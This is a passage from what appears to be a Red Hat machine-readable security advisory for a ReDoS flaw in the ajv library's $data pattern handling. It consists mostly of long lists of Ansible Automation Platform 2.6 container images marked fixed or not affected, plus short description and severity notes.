"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3c83b77b1291ae9e3003b1eb16bcd1b21752733d5ea0b7f9193bea2ba9302215_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6d333bdef78bef7ba85b04a1a6c5d33591263371b5f740813efae68788e32a6c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:86ac843a55e47fa052c11f263a0ebf4f0c969cf5f60f62a5b88006c963f5b772_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:b77fba98853eb0fabcbcd4981c347cf909f50e64ea32f4c0d8313d89cdb48cf7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:094676fb53084cc7ca93010b2667fde26a83c78bd84af7dfef86e27149fc2385_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:1ba54fa91703c8105080e534a74b85b257c0123abb87d9aa4c05f05e32c24c9b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21582b96b79a5a1800ce288633970ed7303655e31a202993df84159d3dca7826_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:d6adc9bd2df9fded6228ddd5dbca3919991913b40fb95b12d4d01cf96c5f4d60_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2439070"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in ajv. When the $data option is enabled, the value of the pattern keyword is passed directly to the JavaScript RegExp() constructor without sufficient validation. An attacker able to supply a malicious regular expression pattern can trigger a ReDoS (Regular Expression Denial of Service), causing the application to become unresponsive and resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "ajv: ReDoS via $data reference",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this issue, the $data option must be enabled and the attacker needs to be able to send a payload with a specially crafted regular expression to the application processing the input. A 31-character payload causes approximately 44 seconds of execution, with each additional character doubling the execution time. Therefore, even a small payload can cause an application to become unresponsive and eventually result in a denial of service. Due to this reason, this flaw has been rated with an important severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3c83b77b1291ae9e3003b1eb16bcd1b21752733d5ea0b7f9193bea2ba9302215_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6d333bdef78bef7ba85b04a1a6c5d33591263371b5f740813efae68788e32a6c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:86ac843a55e47fa052c11f263a0ebf4f0c969cf5f60f62a5b88006c963f5b772_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:b77fba98853eb0fabcbcd4981c347cf909f50e64ea32f4c0d8313d89cdb48cf7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:094676fb53084cc7ca93010b2667fde26a83c78bd84af7dfef86e27149fc2385_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:1ba54fa91703c8105080e534a74b85b257c0123abb87d9aa4c05f05e32c24c9b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21582b96b79a5a1800ce288633970ed7303655e31a202993df84159d3dca7826_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:d6adc9bd2df9fded6228ddd5dbca3919991913b40fb95b12d4d01cf96c5f4d60_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
